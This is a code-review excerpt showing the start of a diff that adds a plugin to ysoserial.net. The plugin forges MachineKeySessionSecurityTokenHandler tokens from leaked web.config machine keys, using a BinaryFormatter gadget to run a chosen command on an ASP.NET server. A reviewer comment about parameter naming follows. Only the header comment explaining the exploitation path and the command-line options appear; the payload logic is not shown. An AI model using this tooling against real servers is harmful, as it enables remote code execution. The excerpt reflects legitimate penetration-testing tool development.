ysoserial/Plugins/MachineKeySessionSecurityTokenHandlerPlugin.cs

```diff
@@ -0,0 +1,146 @@
+using NDesk.Options;
+using System;
+using ysoserial.Generators;
+using System.IdentityModel;
+using System.IO;
+using System.Xml;
+using System.IdentityModel.Tokens;
+using ysoserial.Helpers;
+using System.IdentityModel.Services.Tokens;
+using AspNetTicketBridge;
+
+/**
+ * Author: L@2uR1te (@2308652512)
+ * 
+  * Comments: 
+ *  This plugin is based on the existing SessionSecurityTokenHandler plugin.
+ *  See `MachineKeySessionSecurityTokenHandler`: https://learn.microsoft.com/zh-cn/dotnet/api/system.identitymodel.services.tokens.machinekeysessionsecuritytokenhandler?view=netframework-4.8.1 
+ *  This PoC uses BinaryFormatter from TypeConfuseDelegate
+ *  The Ysoserial.net tool includes an exploit plugin for the SessionSecurityTokenHandler security issue. However, due to the fact that SessionSecurityTokenHandler employs DPAPI for encryption and decryption, it is often difficult to exploit in most cases.
+ *  Nevertheless, Microsoft's documentation on SessionSecurityTokenHandler mentions that for web scenarios requiring a similar security mechanism, one can use the MachineKeySessionSecurityTokenHandler.
+ *  This class inherits from SessionSecurityTokenHandler and shares similar characteristics. The key difference is that MachineKeySessionSecurityTokenHandler utilizes MachineKey configuration information for encryption and decryption operations.
+ *  Therefore, as long as the MachineKey configuration information can be obtained (for instance, through a web.config leak), it may be possible to exploit it, making it more susceptible to exploitation compared to SessionSecurityTokenHandler.
+ *  This PoC produces an error and may crash the application
+**/
+
+namespace ysoserial.Plugins
+{
+    public class MachineKeySessionSecurityTokenHandlerPlugin : IPlugin
+    {
+        static string command = "";
+        static bool test = false;
+        static bool minify = false;
+        static bool useSimpleType = true;
+        static string validationKey = "";
+        static string decryptionKey = "";
+        static string validationAlg = "HMACSHA1";
+        static string decryptionAlg = "AES";
+        static string[] purposes = { "System.IdentityModel.Services.MachineKeyTransform" };
+
+        static OptionSet options = new OptionSet()
+            {
+                {"c|command=", "the command to be executed e.g. \"cmd /c calc\"", v => command = v },
+                {"t|test", "In this scenario, the test mode should not be applied, as the sink point relies on the web environment. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                {"ust|usesimpletype", "This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true", v => useSimpleType =  v != null },
+                {"vk|validationKey=", "Enter the validationKey from the web.config", v => validationKey = v },
```

Comment:
Please use lowercase parameters such as `validationkey` in the input parameters to remain compatible with the ViewState plugin.